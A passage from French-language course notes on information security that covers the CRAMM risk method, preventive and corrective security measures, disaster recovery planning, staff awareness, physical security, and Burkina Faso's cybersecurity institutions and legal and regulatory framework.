inventée par Siemens en Anglettre. Elle est réservée aux grandes entreprises car elle est assez
lourde (recourt à près de 3 000 points de contrôle). Elle possède deux variantes : CRAMM
Express et CRAMM Expert et comporte 3 phases :
Identification de l'existant;
Évaluation des menaces et des vulnérabilités;
Choix des remèdes.
Mesures de sécurité
Après identification des risques, des mesures de sécurité sont mises en place. Plusieurs types
génériques de mesures de sécurité sont identifiés:
Avant sinistre :
- Mesures préventives : détecteur d'intrusion, anti-virus, contrôle d'accès, ...
- Mesures structurelles : occultation des ressources, fragmentation de l'information
afin de réduire la vulnérabilité des ressources;
- Mesures de dissuasion : protections juridiques ou administratives.
Après sinistre :
- Mesures palliatives et correctives : sauvegardes, plan de continuité, redondances ;
45
Politique de sécurité
Plan de secours
Le plan de secours permet d'assurer un fonctionnement des applications critiques après un
sinistre. Il doit être suivi comme un vrai projet et suivre une méthodologie qui pourrait être en
quatre phases suivies d'un audit :
Analyse stratégique :
- Organisation et conduite de projet;
- Analyse des risques;
- Analyse d'impact;
- Définition des modes de fonctionnement normal et minimal de chaque application
critique.
Analyse des solutions :
- Identifier et évaluer les solutions de reprises possibles et de choisir la meilleure en
fonction des critères stratégiques de l'entreprise ;
- Procéder à la rédaction des documents définitifs.
Mise en œuvre opérationnelle :
- Attribution des responsabilités, sensibilisation et formation des responsables de
l'exécution des procédures de reprise ;
- Une documentation complète du plan de secours doit être établie.
Validation et suivi :
- Permet de tester le plan de secours, son efficacité par des simulations d'alertes et la
réalisation de tests de bascule programmés ;
- Permet de documenter et analyser les résultats ;
- Permet de mettre à jour le plan et éventuellement de réorganiser la répartition des
tâches aux membres de l'équipe.
Audit : évaluer, déterminer la qualité du plan établi et élaborer des recommandations.
Généralités
Les objectifs d'une sensibilisation du personnel sont :
Limiter les risques d'un piratage à cause d'une erreur humaine ;
Éviter les fuites/pertes de données volontaires/involontaires ;
Réduire les tentatives d'usurpation d'identité de votre entreprise.
Les outils utilisés sont :
Charte informatique : définir les droits et les devoirs de chacun en matière de
protection des données personnelles, de confidentialité des informations sensibles et
d'usage des outils informatiques;
Politique de sensibilisation : newsletter, affiches dans les bureaux/salles de réunion,
mémos, ...
Formations spécifiques : en fonction des profils il peut y avoir des risques spécifiques
(RH, comptabilité, ...).
46
Politique de sécurité
47
Politique de sécurité
Mettre en place des détecteurs de fumée ainsi que des moyens de lutte contre les
incendies;
Protéger les clés permettant l'accès aux locaux et les codes d'alarme;
Distinguer les zones des bâtiments selon les risques ;
Tenir à jour une liste des personnes ou catégories de personnes autorisées à pénétrer
dans chaque zone;
Établir les règles et moyens de contrôle d'accès des visiteurs.
48
VII.Cadre réglementaire
1. Cadre institutionnel
La CIL
Elle a pour missions :
Informer les personnes sur leurs droits et leurs obligations en matière de traitement de
données personnelles;
Réguler en matière de protection de données en donnant son avis sur les déclarations
(implantation des cameras, les procédure d'achat de drone, la question de l'identifiant
unique de la personne,...);
Contrôler pour s'assurer du respect du bon usage des données personnelles;
Sanctionner en cas d'eccart et faire sanctionner les infractions les plus graves par le
juge (pouvoir de dénonciation).
L'ARCEP
Elle a pour mission :
Réguler le secteur de la télécommunication (équipements, exploitation, identification
des usagers, utilisation des données, ...);
Projet de mise en œuvre d'une infrastructure de gestion de clé publique (PKI) au niveau
national.
La BCLCC
Elle a pour missions de :
Sensibiliser les usagers en publiant régulièrement les informations sur les attaques;
Pouvoir d'investiguer (contrairement à la CIL) lorsqu'il y a infraction ou suspections
d'infraction;
Pouvoir de réprimer.
La Justice
Elle concourt à :
Exploiter des preuves numérique issues des investigations;
Intenter des actions en justice ;
Constitue l'agent OPJ selon convention de Budapest.
49
Cadre réglementaire
ANPTIC
L'ANPTIC a pour missions de :
Faire la promotion du bon usage des TIC;
Protéger l'infrastructure de communication national (RESINA, G-CLOUD, ...);
Concevoir, réaliser, exploiter, maintenir, le SI national.
DGTIC
La DGTIC a pour missions de :
Elaborer des stratégies dans le domaine du numérique;
Définir les politiques sectorielles en matière du numérique.
ANSSI
L'ANSSI a pour mission :
Protéger le Cyberespace national , c'est à dire :
- réduire la vulnérabilité du cyberespace;
- gérer les incidents de sécurité des SI;
- renforcer la culture de la cybersécurité;
- établir des normes spécifiques a la SI;
- veiller au respect de l'audit obligatoire.
se constituer agent technique selon Budapest car elle fournit les preuves numériques à
la BCLCC (OPJ) qui les interprète pour la justice (le parquet);
veiller au Conseil National de Suivi de la mise en œuvre de la SNCS, créé par arrêté
N°2020-059/PM/CAB du 24 novembre 2020.
2. Cadre juridique
Nécessité
Les menaces cybernétiques sont sans frontières d'où la nécessité de considérer un cadre
juridique international régit par des conventions internationales :
Convention de Budapest sur la cybercriminalité;
Convention de l'union africaine sur la cyber sécurité et la protection des données a
caractère personnel;
Directive de la CEDEAO sur la lutte contre la cybercriminalité dans l'espace CEDEAO.
Il y a aussi un cadre juridique national burkinabè.
50
Cadre réglementaire
51
Cadre réglementaire
3. Cadre réglementaire
Cadre réglementaire
Il y a des cadres international, régional et national :
Stratégie régionale de cybersécurité et de lutte contre la cybercriminalité de la CEDEAO
et de la Mauritanie;
Politique régionale de protection des services essentiels et des infrastructures critiques
de la CEDEAO et de la Mauritanie;
Le RGS-BF = référentiel général de sécurité adopté le 23 septembre 2019 par arrêté
2019-023/PM/SG du PM;
La SNCS-BF = stratégie nationale de cybersécurité adopté le 31 décembre 2019 par
arrêté 2019-034/PM/SG du PM ;
Les exigences en matière de gestion de risques de sécurité : le RGS fixe l'échelle
d'évaluation du risque mais n'impose pas les outils et les méthodes (donc chacun peut
utiliser les méthodes et outils qu'il veut : EBIOS, MEHARI, ...);
Les règles et exigences relatives à la cryptographie : le RGS fixe des règles pour la mise
en œuvre de l'infrastructure de confiance;
Les condition de réalisations des audits de sécurité au Burkina et surtout pour les OIC :
être accrédité par l'ANSSI ...
Les conditions en matière d'homologation des solutions et matériel de sécurité au
Burkina Faso;
Les conditions en matière d'hébergement des données surtout sensibles sur les Clouds
privés;
etc.
52